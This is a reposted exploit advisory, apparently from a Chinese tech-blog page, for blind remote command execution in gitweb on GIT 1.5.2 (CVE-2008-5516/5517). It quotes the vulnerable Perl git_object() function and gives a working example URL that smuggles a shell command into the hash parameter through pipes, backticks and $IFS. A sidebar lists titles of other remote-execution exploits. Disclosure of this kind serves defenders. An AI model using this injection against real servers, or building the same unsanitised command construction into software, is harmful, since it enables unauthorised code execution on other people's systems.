gitWeb v1.5.2 Remote Command Execution

简介: # Exploit Title: gitWeb remote command execution # Date: 2009.

# Exploit Title: gitWeb remote command execution
# Date: 2009.06.19
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: GIT 1.5.2
# Tested on: debian linux, GIT 1.5.2
# CVE: CVE-2008-5516 - CVE-2008-5517
  
# Code:
  
# The cgi script doesn't show the command output *blind command execution ;)*
# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()
  
  
sub git_object {
        # object is defined by:
        # - hash or hash_base alone
        # - hash_base and file_name
        my $type;
  
        # - hash or hash_base alone
        if ($hash || ($hash_base && !defined $file_name)) {
                my $object_id = $hash || $hash_base;
  
                my $git_command = git_cmd_str();
                open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"
                        or die_error('404 Not Found', "Object does not exist");
                $type = <$fd>;
                chomp $type;
                close $fd
                        or die_error('404 Not Found', "Object does not exist");
  
        # - hash_base and file_name
  
# Example
http://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785

 

目录
相关文章
|
移动开发 Apache Python
Apache James Server 2.3.2 - Remote Command Execution
#!/usr/bin/python # # Exploit Title: Apache James Server 2.
1314 0
|
PHP Go Windows
Eyou Mail System Remote Code Execution
Hi! The Eyou Mail System have a Remote Code Execution in \inc\fuction.
1331 0
|
安全 网络安全 网络协议
ZPanel 10.0.0.2 Remote Command Execution
One of our expert team members (shachibista@gmail.
639 0
|
Shell Perl 网络协议
Exim sender_address Remote Command Execution
#!/usr/bin/env python #######################################################################...
865 0
|
移动开发 Linux 网络架构
SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions.
1094 0
Xoops 2.3.2 Remote Code Execution
http://packetstormsecurity.org/files/117024/xoops_rce.
693 0
|
监控
Zabbix 1.6.2 Remote Code Execution
http://packetstormsecurity.org/files/117025/Zabbix_RCE.
520 0
Webmin /file/show.cgi Remote Command Execution
http://packetstormsecurity.org/files/116620/webmin_show_cgi_exec.
590 0
Openfiler 2.x NetworkCard Command Execution
http://packetstormsecurity.org/files/116405/Openfiler-2.
516 0
|
监控
ZABBIX 'node_process_command()' Remote Command Execution Vulnerability
http://www.securityfocus.com/data/vulnerabilities/exploits/37989.
589 0